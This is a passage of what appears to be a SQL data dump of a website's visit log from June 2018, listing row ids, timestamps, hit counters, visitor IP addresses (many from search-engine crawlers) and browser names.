0,0,'91.227.206.30','firefox'),(260991,1529578395,1,1,0,0,'37.73.249.94','chrome'),(260992,1529579512,1,1,0,0,'178.154.171.88','other'),(260993,1529579926,1,0,1,0,'66.249.70.25',''),(260994,1529579955,1,0,1,0,'66.249.70.29',''),(260995,1529580063,2,2,0,0,'91.196.178.169','chrome'),(260996,1529580262,1,1,0,0,'141.8.142.74','other'),(260997,1529580422,2,2,0,0,'91.196.177.46','chrome'),(260998,1529581022,1,1,0,0,'37.73.113.143','chrome'),(260999,1529581430,1,1,0,0,'46.211.2.108','other'),(261000,1529581650,1,1,0,0,'62.210.157.129','other'),(261001,1529581651,1,1,0,0,'141.8.142.74','other'),(261002,1529581724,1,1,0,0,'8.29.198.26','other'),(261003,1529581981,1,1,0,0,'46.33.50.92','chrome'),(261004,1529582398,1,1,0,0,'87.250.224.46','other'),(261005,1529582862,1,1,0,0,'77.222.140.134','chrome'),(261006,1529582865,1,1,0,0,'91.196.178.103','chrome'),(261007,1529582877,1,1,0,0,'66.249.70.27','chrome'),(261008,1529582990,1,0,1,0,'66.249.64.28',''),(261009,1529583156,1,1,0,0,'216.244.66.241','other'),(261010,1529584058,1,1,0,0,'92.112.125.243','chrome'),(261011,1529584160,2,2,0,0,'78.111.185.76','chrome'),(261012,1529584486,2,0,2,0,'66.249.64.28',''),(261013,1529584680,1,1,0,0,'37.9.113.182','other'),(261014,1529584920,1,1,0,0,'89.21.76.5','chrome'),(261015,1529585483,1,1,0,0,'195.123.217.153','other'),(261016,1529585666,1,1,0,0,'216.244.66.241','other'),(261017,1529585698,5,5,0,0,'78.111.186.253','chrome'),(261018,1529585862,2,2,0,0,'91.196.178.73','chrome'),(261019,1529586295,1,1,0,0,'89.21.76.5','chrome'),(261020,1529586396,1,0,1,0,'66.249.64.30',''),(261021,1529586514,1,1,0,0,'178.154.171.88','other'),(261022,1529587252,1,1,0,0,'8.29.198.27','other'),(261023,1529587935,1,1,0,0,'180.76.15.8','other'),(261024,1529588318,1,1,0,0,'157.55.39.121','other'),(261025,1529590071,1,1,0,0,'216.244.66.241','other'),(261026,1529590097,1,1,0,0,'66.249.64.30','chrome'),(261027,1529590356,1,1,0,0,'141.8.142.74','other'),(261028,1529590456,1,1,0,0,'66.249.64.29','chrome'),(261029,1529590489,1,0,1,0,'66.249.64.28',''),(261030,1529591163,1,1,0,0,'94.179.132.30','chrome'),(261031,1529591213,1,1,0,0,'77.111.247.47','chrome'),(261032,1529591259,1,1,0,0,'91.196.177.46','chrome'),(261033,1529591479,1,1,0,0,'188.230.43.254','other'),(261034,1529591808,1,1,0,0,'95.163.255.95','other'),(261035,1529591981,1,1,0,0,'91.196.178.104','chrome'),(261036,1529592208,1,1,0,0,'91.196.178.187','chrome'),(261037,1529592550,3,3,0,0,'141.8.142.74','other'),(261038,1529592561,1,1,0,0,'8.29.198.25','other'),(261039,1529592652,2,2,0,0,'216.244.66.241','other'),(261040,1529592677,1,1,0,0,'188.230.43.254','other'),(261041,1529593043,1,1,0,0,'157.55.39.241','other'),(261042,1529593201,1,1,0,0,'95.133.153.47','chrome'),(261043,1529593653,1,1,0,0,'37.9.113.182','other'),(261044,1529593915,2,2,0,0,'91.196.178.74','chrome'),(261045,1529594261,1,1,0,0,'188.230.43.254','other'),(261046,1529594463,1,1,0,0,'51.255.66.115','other'),(261047,1529596243,2,2,0,0,'130.180.219.13','chrome'),(261048,1529596278,1,1,0,0,'188.230.43.254','other'),(261049,1529597117,1,1,0,0,'141.8.142.74','other'),(261050,1529597364,22,22,0,0,'5.9.155.37','other'),(261051,1529597775,1,1,0,0,'157.55.39.241','other'),(261052,1529598043,1,1,0,0,'176.105.213.141','chrome'),(261053,1529598093,1,1,0,0,'8.29.198.25','other'),(261054,1529598358,1,1,0,0,'180.76.15.26','other'),(261055,1529598670,1,1,0,0,'188.230.43.254','other'),(261056,1529599669,1,1,0,0,'66.102.9.35','chrome'),(261057,1529599689,2,2,0,0,'66.102.9.38','chrome'),(261058,1529600209,1,0,1,0,'66.249.70.29',''),(261059,1529600375,1,1,0,0,'107.21.1.8','other'),(261060,1529602311,1,1,0,0,'91.196.178.72','firefox'),(261061,1529602397,1,1,0,0,'216.244.66.241','other'),(261062,1529603031,138,138,0,0,'195.201.96.246','other'),(261063,1529603387,1,1,0,0,'8.29.198.25','other'),(261064,1529603923,2,2,0,0,'46.133.177.239','chrome'),(261065,1529604350,1,1,0,0,'207.46.13.212','other'),(261066,1529606377,1,1,0,0,'52.53.201.78','chrome'),(261067,1529607947,1,1,0,0,'216.244.66.241','other'),(261068,1529608907,1,1,0,0,'95.163.255.117','other'),(261069,1529608947,1,1,0,0,'157.55.39.121','other'),(261070,1529608948,1,1,0,0,'8.29.198.26','other'),(261071,1529610493,1,1,0,0,'216.244.66.241','other'),(261072,1529610798,1,1,0,0,'178.154.171.88','other'),(261073,1529611571,1,1,0,0,'66.249.64.30','chrome'),(261074,1529612187,1,1,0,0,'216.244.66.241','other'),(261075,1529612219,2,2,0,0,'92.112.225.106','chrome'),(261076,1529612603,1,1,0,0,'95.132.116.169','chrome'),(261077,1529612729,1,0,1,0,'66.249.64.16',''),(261078,1529613424,2,2,0,0,'178.154.171.88','other'),(261079,1529613990,2,2,0,0,'216.244.66.241','other'),(261080,1529614224,1,1,0,0,'8.29.198.27','other'),(261081,1529615359,1,1,0,0,'216.244.66.241','other'),(261082,1529616095,2,2,0,0,'91.196.178.174','chrome'),(261083,1529616861,1,1,0,0,'178.154.171.88','other'),(261084,1529617812,1,0,1,0,'66.249.70.27',''),(261085,1529618497,1,1,0,0,'141.8.142.74','other'),(261086,1529618721,1,1,0,0,'66.249.70.29','chrome'),(261087,1529618790,1,0,1,0,'66.249.64.30',''),(261088,1529619438,2,2,0,0,'141.8.142.74','other'),(261089,1529619792,1,1,0,0,'8.29.198.27','other'),(261090,1529619874,37,37,0,0,'144.217.15.198','other'),(261091,1529620034,2,2,0,0,'178.154.171.88','other'),(261092,1529620958,1,1,0,0,'216.244.66.241','other'),(261093,1529622762,1,1,0,0,'157.55.39.121','other'),(261094,1529624035,1,1,0,0,'87.250.224.46','other'),(261095,1529624037,1,1,0,0,'54.165.59.7','other'),(261096,1529625060,1,1,0,0,'8.29.198.26','other'),(261097,1529625182,1,1,0,0,'141.8.142.74','other'),(261098,1529625295,1,1,0,0,'178.154.171.10','other'),(261099,1529626782,2,2,0,0,'141.8.142.74','other'),(261100,1529628944,1,1,0,0,'37.9.113.132','other'),(261101,1529629037,1,1,0,0,'216.244.66.241','other'),(261102,1529630237,1,1,0,0,'5.45.207.82','other'),(261103,1529630295,1,1,0,0,'66.249.64.28','chrome'),(261104,1529630354,1,1,0,0,'95.163.255.93','other'),(261105,1529630403,1,1,0,0,'66.249.64.29','chrome'),(261106,1529630484,1,1,0,0,'141.8.142.167','other'),(261107,1529630487,1,1,0,0,'178.154.171.60','other'),(261108,1529630595,1,1,0,0,'213.180.203.40','other'),(261109,1529630632,1,1,0,0,'8.29.198.26','other'),(261110,1529631680,1,1,0,0,'95.163.255.106','other'),(261111,1529632312,1,1,0,0,'66.249.64.28','chrome'),(261112,1529632889,6,6,0,0,'46.4.68.71','other'),(261113,1529633923,1,1,0,0,'66.249.64.29','chrome'),(261114,1529635328,1,1,0,0,'91.209.11.236','other'),(261115,1529635902,1,1,0,0,'8.29.198.25','other'),(261116,1529636789,33,33,0,0,'207.46.13.212','other'),(261117,1529636820,47,47,0,0,'157.55.39.241','other'),(261118,1529636873,49,49,0,0,'157.55.39.121','other'),(261119,1529637627,1,1,0,0,'40.77.167.79','other'),(261120,1529638425,2,0,2,0,'66.249.70.27',''),(261121,1529639087,1,1,0,0,'216.244.66.241','other'),(261122,1529639104,1,0,1,0,'66.249.70.29',''),(261123,1529639453,1,0,1,0,'66.249.70.27',''),(261124,1529639556,1,0,1,0,'66.249.70.25',''),(261125,1529639831,1,1,0,0,'178.154.171.88','other'),(261126,1529641124,1,1,0,0,'54.165.59.7','other'),(261127,1529641484,1,1,0,0,'8.29.198.26','other'),(261128,1529641527,1,1,0,0,'216.244.66.241','other'),(261129,1529642034,1,1,0,0,'89.221.216.62','other'),(261130,1529642351,1,1,0,0,'40.77.167.79','other'),(261131,1529643564,1,1,0,0,'216.244.66.241','other'),(261132,1529644390,4,4,0,0,'188.40.102.170','other'),(261133,1529645589,3,3,0,0,'91.196.178.82','chrome'),(261134,1529646678,1,1,0,0,'157.55.39.241','other'),(261135,1529646737,1,1,0,0,'8.29.198.26','other'),(261136,1529647446,1,1,0,0,'216.244.66.241','other'),(261137,1529649393,1,1,0,0,'178.154.171.88','other'),(261138,1529649470,1,1,0,0,'141.8.142.74','other'),(261139,1529649747,1,1,0,0,'157.55.39.121','other'),(261140,1529649759,2,2,0,0,'91.196.178.82','chrome'),(261141,1529649882,1,1,0,0,'90.154.47.14','chrome'),(261142,1529650071,1,1,0,0,'91.196.178.130','chrome'),(261143,1529650115,1,1,0,0,'216.244.66.241','other'),(261144,1529651155,1,1,0,0,'157.55.39.121','other'),(261145,1529651348,1,1,0,0,'216.244.66.241','other'),(261146,1529651400,1,1,0,0,'91.196.177.15','chrome'),(261147,1529651638,2,2,0,0,'91.196.178.82','chrome'),(261148,1529651963,1,1,0,0,'94.153.192.46','firefox'),(261149,1529652087,1,1,0,0,'195.10.210.70','chrome'),(261150,1529652348,1,1,0,0,'8.29.198.27','other'),(261151,1529652437,1,1,0,0,'157.55.39.241','other'),(261152,1529652666,2,2,0,0,'178.154.171.88','other'),(261153,1529653188,1,0,1,0,'66.249.64.28',''),(261154,1529653221,1,0,1,0,'66.249.64.29',''),(261155,1529653261,1,1,0,0,'66.249.64.28','chrome'),(261156,1529653471,1,1,0,0,'91.196.178.186','chrome'),(261157,1529653986,1,0,1,0,'66.249.64.30',''),(261158,1529654104,1,1,0,0,'46.201.85.221','chrome'),(261159,1529654139,2,2,0,0,'216.244.66.241','other'),(261160,1529654195,2,2,0,0,'91.196.178.169','chrome'),(261161,1529654806,1,0,1,0,'66.249.64.28',''),(261162,1529654930,1,1,0,0,'91.196.178.82','chrome'),(261163,1529655647,1,1,0,0,'216.244.66.241','other'),(261164,1529655653,1,1,0,0,'46.201.227.188','chrome'),(261165,1529655824,1,1,0,0,'180.76.15.143','other'),(261166,1529656250,1,0,1,0,'66.249.64.30',''),(261167,1529656596,1,1,0,0,'87.250.224.46','other'),(261168,1529656999,1,0,1,0,'66.249.64.28',''),(261169,1529657000,1,1,0,0,'40.77.167.79','other'),(261170,1529657325,1,1,0,0,'141.8.142.74','other'),(261171,1529657384,1,1,0,0,'91.196.178.174','chrome'),(261172,1529657579,1,1,0,0,'8.29.198.25','other'),(261173,1529657658,2,2,0,0,'91.196.178.171','chrome'),(261174,1529657716,1,1,0,0,'95.163.255.95','other'),(261175,1529657916,1,1,0,0,'94.179.42.19','chrome'),(261176,1529657958,1,1,0,0,'77.239.166.200','chrome'),(261177,1529658410,1,1,0,0,'91.196.178.73','firefox'),(261178,1529659044,1,1,0,0,'46.201.227.188','chrome'),(261179,1529659262,1,0,1,0,'66.249.70.27',''),(261180,1529659640,2,0,2,0,'66.249.64.29',''),(261181,1529659960,1,1,0,0,'37.9.113.182','other'),(261182,1529659965,1,1,0,0,'178.154.171.88','other'),(261183,1529660215,1,1,0,0,'91.196.178.93','chrome'),(261184,1529660664,1,1,0,0,'178.92.248.241','chrome'),(261185,1529660705,1,0,1,0,'66.249.64.29',''),(261186,1529660736,2,2,0,0,'141.8.142.74','other'),(261187,1529660760,1,0,1,0,'66.249.64.30',''),(261188,1529661180,1,1,0,0,'91.196.178.76','chrome'),(261189,1529661199,1,1,0,0,'216.244.66.241','other'),(261190,1529661208,1,1,0,0,'158.69.26.193','other'),(261191,1529661234,1,1,0,0,'37.110.129.98','msie'),(261192,1529661236,1,1,0,0,'158.69.26.193','chrome'),(261193,1529661463,1,1,0,0,'91.196.178.97','chrome'),(261194,1529661649,1,1,0,0,'188.32.144.122','msie'),(261195,1529662159,1,1,0,0,'178.92.248.241','chrome'),(261196,1529662239,2,2,0,0,'91.196.177.134','chrome'),(261197,1529662394,1,1,0,0,'91.196.178.76','firefox'),(261198,1529662843,2,0,2,0,'66.249.70.29',''),(261199,1529662886,4,0,4,0,'66.249.70.25',''),(261200,1529663191,1,1,0,0,'8.29.198.25','other'),(261201,1529663859,1,1,0,0,'216.244.66.241','other'),(261202,1529664650,1,1,0,0,'141.8.142.74','other'),(261203,1529664672,2,2,0,0,'178.154.171.88','other'),(261204,1529664896,1,1,0,0,'66.249.70.27','chrome'),(261205,1529665333,1,1,0,0,'216.244.66.241','other'),(261206,1529665659,1,1,0,0,'141.8.142.74','other'),(261207,1529665917,1,1,0,0,'180.76.15.137','other'),(261208,1529666184,1,0,1,0,'66.249.64.30',''),(261209,1529666352,2,2,0,0,'91.196.178.169','chrome'),(261210,1529666668,1,1,0,0,'91.196.177.46','chrome'),(261211,1529666712,1,1,0,0,'178.154.171.88','other'),(261212,1529668426,1,1,0,0,'8.29.198.27','other'),(261213,1529668627,1,1,0,0,'37.115.137.115','chrome'),(261214,1529668928,1,1,0,0,'91.196.178.135','firefox'),(261215,1529668952,1,1,0,0,'91.196.96.131','chrome'),(261216,1529669450,2,2,0,0,'91.196.178.169','chrome'),(261217,1529669906,1,1,0,0,'91.142.174.117','chrome'),(261218,1529669908,1,1,0,0,'141.8.142.74','other'),(261219,1529670012,1,1,0,0,'178.154.171.88','other'),(261220,1529670515,1,0,1,0,'66.249.64.30',''),(261221,1529670772,1,1,0,0,'66.102.9.29','chrome'),(261222,1529670777,1,1,0,0,'66.102.9.25','chrome'),(261223,1529670793,1,1,0,0,'66.102.9.27','chrome'),(261224,1529670863,3,3,0,0,'216.244.66.241','other'),(261225,1529671739,1,1,0,0,'66.102.9.29','chrome'),(261226,1529672461,3,3,0,0,'66.249.64.28','chrome'),(261227,1529672498,28,28,0,0,'54.81.71.68','other'),(261228,1529672642,1,0,1,0,'66.249.70.29',''),(261229,1529672677,1,0,1,0,'66.249.64.29',''),(261230,1529673412,1,1,0,0,'195.10.210.70','chrome'),(261231,1529673455,2,2,0,0,'141.8.142.74','other'),(261232,1529673740,1,1,0,0,'216.244.66.241','other'),(261233,1529673887,2,2,0,0,'178.154.171.88','other'),(261234,1529674050,1,1,0,0,'8.29.198.25','other'),(261235,1529674393,1,1,0,0,'141.8.142.74','other'),(261236,1529675077,1,1,0,0,'216.244.66.241','other'),(261237,1529676093,1,1,0,0,'178.154.171.88','other'),(261238,1529677719,1,1,0,0,'91.239.95.244','chrome'),(261239,1529677926,2,2,0,0,'141.8.142.74','other'),(261240,1529677978,1,1,0,0,'178.154.171.88','other'),(261241,1529678748,1,1,0,0,'66.249.70.27','chrome'),(261242,1529679267,1,1,0,0,'8.29.198.26','other'),(261243,1529680628,1,0,1,0,'66.249.64.28',''),(261244,1529680724,1,1,0,0,'188.230.43.254','other'),(261245,1529680737,1,1,0,0,'37.73.234.227','chrome'),(261246,1529681023,2,0,2,0,'66.249.64.29',''),(261247,1529681552,2,2,0,0,'87.250.224.46','other'),(261248,1529681984,1,1,0,0,'216.244.66.241','other'),(261249,1529682067,1,1,0,0,'66.249.70.25','chrome'),(261250,1529682068,1,1,0,0,'66.249.70.27','chrome'),(261251,1529682342,1,1,0,0,'141.8.142.74','other'),(261252,1529683091,2,2,0,0,'91.196.178.54','chrome'),(261253,1529683122,1,1,0,0,'188.230.43.254','other'),(261254,1529683380,2,2,0,0,'216.244.66.241','other'),(261255,1529684184,1,1,0,0,'95.163.255.94','other'),(261256,1529684782,26,26,0,0,'142.44.159.96','other'),(261257,1529684913,1,1,0,0,'8.29.198.27','other'),(261258,1529685506,2,2,0,0,'141.8.142.74','other'),(261259,1529685534,1,1,0,0,'188.230.43.254','other'),(261260,1529685620,2,0,2,0,'66.249.70.27',''),(261261,1529685715,1,0,1,0,'66.249.64.30',''),(261262,1529685732,2,0,2,0,'66.249.64.29',''),(261263,1529685763,1,0,1,0,'66.249.64.28',''),(261264,1529685855,1,1,0,0,'178.154.171.88','other'),(261265,1529686254,1,1,0,0,'216.244.66.241','other'),(261266,1529686409,1,1,0,0,'141.8.142.74','other'),(261267,1529689684,1,1,0,0,'141.8.142.74','other'),(261268,1529689831,1,1,0,0,'188.32.21.83','msie'),(261269,1529690120,1,1,0,0,'8.29.198.25','other'),(261270,1529690190,1,0,1,0,'66.249.70.27',''),(261271,1529690232,1,0,1,0,'66.249.64.28',''),(261272,1529690613,1,1,0,0,'95.128.150.15','firefox'),(261273,1529690677,1,0,1,0,'66.249.70.25',''),(261274,1529690734,2,0,2,0,'66.249.70.29',''),(261275,1529691338,4,0,4,0,'66.249.70.27',''),(261276,1529691667,2,2,0,0,'91.196.178.35','chrome'),(261277,1529691775,1,0,1,0,'66.249.70.25',''),(261278,1529691953,1,1,0,0,'216.244.66.241','other'),(261279,1529692605,1,1,0,0,'87.250.224.46','other'),(261280,1529692828,43,43,0,0,'54.224.91.246','other'),(261281,1529692938,2,2,0,0,'141.8.142.74','other'),(261282,1529693019,1,0,1,0,'66.249.64.28',''),(261283,1529693043,1,1,0,0,'216.244.66.241','other'),(261284,1529693295,1,1,0,0,'91.209.11.236','other'),(261285,1529693745,49,49,0,0,'54.224.91.246','other'),(261286,1529693895,1,0,1,0,'66.249.64.29',''),(261287,1529694033,1,1,0,0,'87.250.224.46','other'),(261288,1529694288,92,92,0,0,'40.77.167.79','other'),(261289,1529694314,102,102,0,0,'157.55.39.121','other'),(261290,1529694344,81,81,0,0,'157.55.39.241','other'),(261291,1529694529,91,91,0,0,'207.46.13.212','other'),(261292,1529694666,8,8,0,0,'54.224.91.246','other'),(261293,1529694936,1,1,0,0,'37.73.155.2','chrome'),(261294,1529695402,1,0,1,0,'66.249.70.27',''),(261295,1529695762,1,1,0,0,'8.29.198.27','other'),(261296,1529695851,1,1,0,0,'216.244.66.241','other'),(261297,1529695919,1,1,0,0,'178.92.139.44','chrome'),(261298,1529695980,1,1,0,0,'157.55.39.241','other'),(261299,1529696476,1,1,0,0,'141.8.142.74','other'),(261300,1529697062,1,1,0,0,'66.249.70.25','chrome'),(261301,1529697070,1,1,0,0,'66.249.64.28','chrome'),(261302,1529697076,1,0,1,0,'66.249.70.27',''),(261303,1529697213,2,2,0,0,'216.244.66.241','other'),(261304,1529698093,1,0,1,0,'66.249.64.30',''),(261305,1529698193,1,1,0,0,'87.250.224.46','other'),(261306,1529698384,1,0,1,0,'66.249.70.27',''),(261307,1529698880,1,1,0,0,'216.244.66.241','other'),(261308,1529699822,1,0,1,0,'66.249.70.25',''),(261309,1529699912,1,1,0,0,'91.209.11.236','other'),(261310,1529700216,1,1,0,0,'216.244.66.241','other'),(261311,1529700961,1,1,0,0,'8.29.198.25','other'),(261312,1529701112,1,1,0,0,'157.55.39.241','other'),(261313,1529701162,1,1,0,0,'87.250.224.46','other'),(261314,1529701189,1,1,0,0,'178.154.171.88','other'),(261315,1529701793,1,1,0,0,'46.211.133.155','other'),(261316,1529702301,1,1,0,0,'141.8.142.74','other'),(261317,1529702622,1,1,0,0,'180.76.15.9','other'),(261318,1529702695,1,0,1,0,'66.249.70.25',''),(261319,1529703644,1,0,1,0,'66.249.70.29',''),(261320,1529703714,23,23,0,0,'142.44.159.96','other'),(261321,1529703735,1,0,1,0,'66.249.70.25',''),(261322,1529703822,1,0,1,0,'66.249.70.27',''),(261323,1529704043,2,2,0,0,'141.8.142.74','other'),(261324,1529704622,1,1,0,0,'180.76.15.160','other'),(261325,1529705327,1,1,0,0,'141.8.142.74','other'),(261326,1529705669,36,36,0,0,'207.46.13.78','other'),(261327,1529705699,33,33,0,0,'207.46.13.212','other'),(261328,1529705742,49,49,0,0,'157.55.39.121','other'),(261329,1529705772,48,48,0,0,'157.55.39.241','other'),(261330,1529705894,1,0,1,0,'66.249.70.27',''),(261331,1529706031,1,1,0,0,'66.249.64.30','chrome'),(261332,1529706604,1,1,0,0,'8.29.198.26','other'),(261333,1529706668,1,1,0,0,'47.96.234.252','other'),(261334,1529707022,1,1,0,0,'66.249.64.15','chrome'),(261335,1529707310,1,1,0,0,'66.249.64.29','chrome'),(261336,1529707462,2,0,2,0,'66.249.70.25',''),(261337,1529707573,1,1,0,0,'66.249.64.30','chrome'),(261338,1529707931,1,1,0,0,'66.249.70.29','chrome'),(261339,1529708068,1,1,0,0,'178.154.171.88','other'),(261340,1529708069,4,4,0,0,'216.244.66.241','other'),(261341,1529708719,1,0,1,0,'66.249.70.27',''),(261342,1529709119,1,0,1,0,'66.249.70.29',''),(261343,1529709545,2,2,0,0,'66.249.70.25','chrome'),(261344,1529709632,1,1,0,0,'95.163.255.115','other'),(261345,1529709693,1,1,0,0,'40.77.167.213','other'),(261346,1529709793,1,1,0,0,'66.249.70.29','chrome'),(261347,1529709881,1,1,0,0,'52.87.252.97','other'),(261348,1529709906,1,1,0,0,'66.249.64.16','chrome'),(261349,1529710751,1,0,1,0,'66.249.70.27',''),(261350,1529710785,1,1,0,0,'52.87.252.97','other'),(261351,1529710974,1,1,0,0,'66.249.64.29','chrome'),(261352,1529711156,1,1,0,0,'216.244.66.241','other'),(261353,1529711467,2,1,1,0,'66.249.64.28',''),(261354,1529711689,1,1,0,0,'52.87.252.97','other'),(261355,1529711774,2,1,1,0,'66.249.70.27',''),(261356,1529711799,1,1,0,0,'8.29.198.26','other'),(261357,1529712593,1,1,0,0,'52.87.252.97','other'),(261358,1529712893,1,1,0,0,'178.154.171.60','other'),(261359,1529713153,5,1,4,0,'66.249.70.25',''),(261360,1529713197,7,1,6,0,'66.249.70.27',''),(261361,1529713352,2,0,2,0,'66.249.70.29',''),(261362,1529713398,5,1,4,0,'66.249.70.25',''),(261363,1529713494,4,1,3,0,'66.249.70.25',''),(261364,1529713529,1,1,0,0,'52.87.252.97','other'),(261365,1529713574,1,1,0,0,'66.249.70.27','chrome'),(261366,1529713673,1,1,0,0,'66.249.70.29','chrome'),(261367,1529713846,1,1,0,0,'23.229.64.49','firefox'),(261368,1529714448,1,1,0,0,'52.87.252.97','other'),(261369,1529714534,1,0,1,0,'66.249.70.27',''),(261370,1529715383,1,1,0,0,'52.87.252.97','other'),(261371,1529716284,1,1,0,0,'95.163.255.103','other'),(261372,1529716316,1,1,0,0,'52.87.252.97','other'),(261373,1529716356,1,1,0,0,'216.244.66.241','other'),(261374,1529716573,1,1,0,0,'141.8.142.74','other'),(261375,1529716577,1,0,1,0,'66.249.70.27',''),(261376,1529716789,1,1,0,0,'66.249.64.28','chrome'),(261377,1529716976,3,2,1,0,'66.249.70.27',''),(261378,1529717052,1,1,0,0,'178.154.171.4','other'),(261379,1529717068,1,0,1,0,'66.249.70.25',''),(261380,1529717251,1,1,0,0,'52.87.252.97','other'),(261381,1529717448,1,1,0,0,'8.29.198.25','other'),(261382,1529717537,2,1,1,0,'66.249.70.27',''),(261383,1529717702,1,0,1,0,'66.249.70.29',''),(261384,1529718166,2,2,0,0,'52.87.252.97','other'),(261385,1529718336,1,1,0,0,'66.249.70.29','chrome'),(261386,1529718394,1,0,1,0,'66.249.64.28',''),(261387,1529718571,1,1,0,0,'66.249.64.29','chrome'),(261388,1529719068,1,1,0,0,'52.87.252.97','other'),(261389,1529719335,3,2,1,0,'66.249.70.27',''),(261390,1529719980,1,0,1,0,'66.249.70.25',''),(261391,1529720001,1,1,0,0,'52.87.252.97','other'),(261392,1529720152,1,0,1,0,'66.249.70.29',''),(261393,1529720533,1,0,1,0,'66.249.70.27',''),(261394,1529720555,3,1,2,0,'66.249.70.25',''),(261395,1529720580,1,1,0,0,'178.154.171.88','other'),(261396,1529720924,1,1,0,0,'52.87.252.97','other'),(261397,1529720967,1,1,0,0,'87.250.224.46','other'),(261398,1529721829,1,1,0,0,'52.87.252.97','other'),(261399,1529721855,1,1,0,0,'66.249.70.25','chrome'),(261400,1529722418,1,0,1,0,'66.249.70.27',''),(261401,1529722638,1,1,0,0,'8.29.198.26','other'),(261402,1529722725,1,1,0,0,'37.9.113.182','other'),(261403,1529722763,1,1,0,0,'52.87.252.97','other'),(261404,1529723467,1,0,1,0,'66.249.70.27',''),(261405,1529723544,1,1,0,0,'178.154.171.88','other'),(261406,1529723697,1,1,0,0,'52.87.252.97','other'),(261407,1529723932,1,0,1,0,'66.249.64.28',''),(261408,1529724055,1,0,1,0,'66.249.70.25',''),(261409,1529724617,1,1,0,0,'52.87.252.97','other'),(261410,1529724748,1,1,0,0,'216.244.66.241','other'),(261411,1529724771,1,0,1,0,'66.249.70.29',''),(261412,1529725261,1,0,1,0,'66.249.70.27',''),(261413,1529725358,2,2,0,0,'66.249.70.25','chrome'),(261414,1529725520,1,1,0,0,'52.87.252.97','other'),(261415,1529725616,1,1,0,0,'66.249.70.29','chrome'),(261416,1529726005,1,0,1,0,'66.249.64.30',''),(261417,1529726160,1,1,0,0,'87.250.224.46','other'),(261418,1529726181,2,0,2,0,'66.249.70.27',''),(261419,1529726241,1,1,0,0,'188.32.75.147','msie'),(261420,1529726453,1,1,0,0,'52.87.252.97','other'),(261421,1529726579,1,1,0,0,'66.249.70.27','chrome'),(261422,1529726833,2,2,0,0,'157.55.39.137','other'),(261423,1529726939,1,0,1,0,'66.249.70.29',''),(261424,1529727387,1,1,0,0,'52.87.252.97','other'),(261425,1529727630,2,2,0,0,'178.154.171.88','other'),(261426,1529727659,1,1,0,0,'66.249.70.27','chrome'),(261427,1529727840,1,1,0,0,'66.249.64.30','chrome'),(261428,1529728198,1,1,0,0,'66.249.70.25','chrome'),(261429,1529728265,1,1,0,0,'95.163.255.94','other'),(261430,1529728290,1,1,0,0,'8.29.198.25','other'),(261431,1529728310,1,1,0,0,'52.87.252.97','other'),(261432,1529729033,1,0,1,0,'66.249.70.27',''),(261433,1529729140,1,1,0,0,'178.154.171.88','other'),(261434,1529729225,1,1,0,0,'52.87.252.97','other'),(261435,1529730163,1,1,0,0,'52.87.252.97','other'),(261436,1529730451,1,1,0,0,'66.249.70.27','chrome'),(261437,1529730765,2,1,1,0,'66.249.70.25',''),(261438,1529730916,1,1,0,0,'178.154.171.88','other'),(261439,1529731051,1,1,0,0,'216.244.66.241','other'),(261440,1529731098,1,1,0,0,'52.87.252.97','other'),(261441,1529731317,1,1,0,0,'66.249.64.28','chrome'),(261442,1529731335,1,1,0,0,'47.96.234.201','other'),(261443,1529731670,1,1,0,0,'66.249.70.27','chrome'),(261444,1529732004,1,1,0,0,'52.87.252.97','other'),(261445,1529732587,3,1,2,0,'66.249.70.25',''),(261446,1529732907,1,1,0,0,'52.87.252.97','other'),(261447,1529733044,1,0,1,0,'66.249.70.27',''),(261448,1529733104,1,1,0,0,'66.249.70.25','chrome'),(261449,1529733480,1,1,0,0,'8.29.198.25','other'),(261450,1529733811,2,1,1,0,'66.249.70.27',''),(261451,1529733839,1,1,0,0,'52.87.252.97','other'),(261452,1529733872,1,1,0,0,'141.8.142.74','other'),(261453,1529733971,1,1,0,0,'66.249.70.29','chrome'),(261454,1529734130,1,0,1,0,'66.249.70.25',''),(261455,1529734772,1,1,0,0,'52.87.252.97','other'),(261456,1529734909,1,1,0,0,'95.163.255.96','other'),(261457,1529734935,1,1,0,0,'66.249.70.27','chrome'),(261458,1529735493,1,1,0,0,'141.8.142.74','other'),(261459,1529735698,1,1,0,0,'52.87.252.97','other'),(261460,1529735903,2,0,2,0,'66.249.70.27',''),(261461,1529735936,1,0,1,0,'66.249.64.28',''),(261462,1529736087,1,1,0,0,'216.244.66.241','other'),(261463,1529736602,1,1,0,0,'52.87.252.97','other'),(261464,1529736685,1,1,0,0,'178.92.159.175','firefox'),(261465,1529736822,2,2,0,0,'95.163.255.109','other'),(261466,1529737241,2,2,0,0,'141.8.142.74','other'),(261467,1529737267,1,1,0,0,'157.55.39.137','other'),(261468,1529737298,2,0,2,0,'66.249.70.29',''),(261469,1529737409,1,0,1,0,'66.249.70.25',''),(261470,1529737475,1,0,1,0,'66.249.70.27',''),(261471,1529737513,1,1,0,0,'216.244.66.241','other'),(261472,1529737536,1,1,0,0,'52.87.252.97','other'),(261473,1529737801,2,2,0,0,'91.196.178.72','chrome'),(261474,1529738269,2,2,0,0,'130.180.218.188','chrome'),(261475,1529738400,1,1,0,0,'95.163.107.70','chrome'),(261476,1529738470,1,1,0,0,'52.87.252.97','other'),(261477,1529738808,1,0,1,0,'66.249.70.29',''),(261478,1529739070,1,1,0,0,'66.249.70.25','chrome'),(261479,1529739085,1,1,0,0,'66.249.70.27','chrome'),(261480,1529739146,1,1,0,0,'8.29.198.26','other'),(261481,1529739387,1,1,0,0,'52.87.252.97','other'),(261482,1529739567,1,0,1,0,'66.249.64.30',''),(261483,1529740244,1,0,1,0,'66.249.70.25',''),(261484,1529740294,1,1,0,0,'52.87.252.97','other'),(261485,1529740338,1,1,0,0,'66.249.70.25','chrome'),(261486,1529741059,1,0,1,0,'66.249.64.30',''),(261487,1529741226,1,1,0,0,'52.87.252.97','other'),(261488,1529741437,3,0,3,0,'66.249.70.25',''),(261489,1529741459,1,1,0,0,'216.244.66.241','other'),(261490,1529741519,1,0,1,0,'66.249.70.27',''),(261491,1529741584,5,5,0,0,'195.10.210.70','chrome'),(261492,1529741976,1,1,0,0,'66.249.70.27','chrome'),(261493,1529742033,1,0,1,0,'66.249.70.29',''),(261494,1529742163,1,1,0,0,'52.87.252.97','other'),(261495,1529742424,1,1,0,0,'95.163.255.98','other'),(261496,1529742517,2,2,0,0,'216.244.66.241','other'),(261497,1529742840,2,2,0,0,'178.154.171.88','other'),(261498,1529743082,1,1,0,0,'52.87.252.97','other'),(261499,1529743286,1,0,1,0,'66.249.64.28',''),(261500,1529743332,1,1,0,0,'94.179.11.149','opera'),(261501,1529743368,1,0,1,0,'66.249.64.30',''),(261502,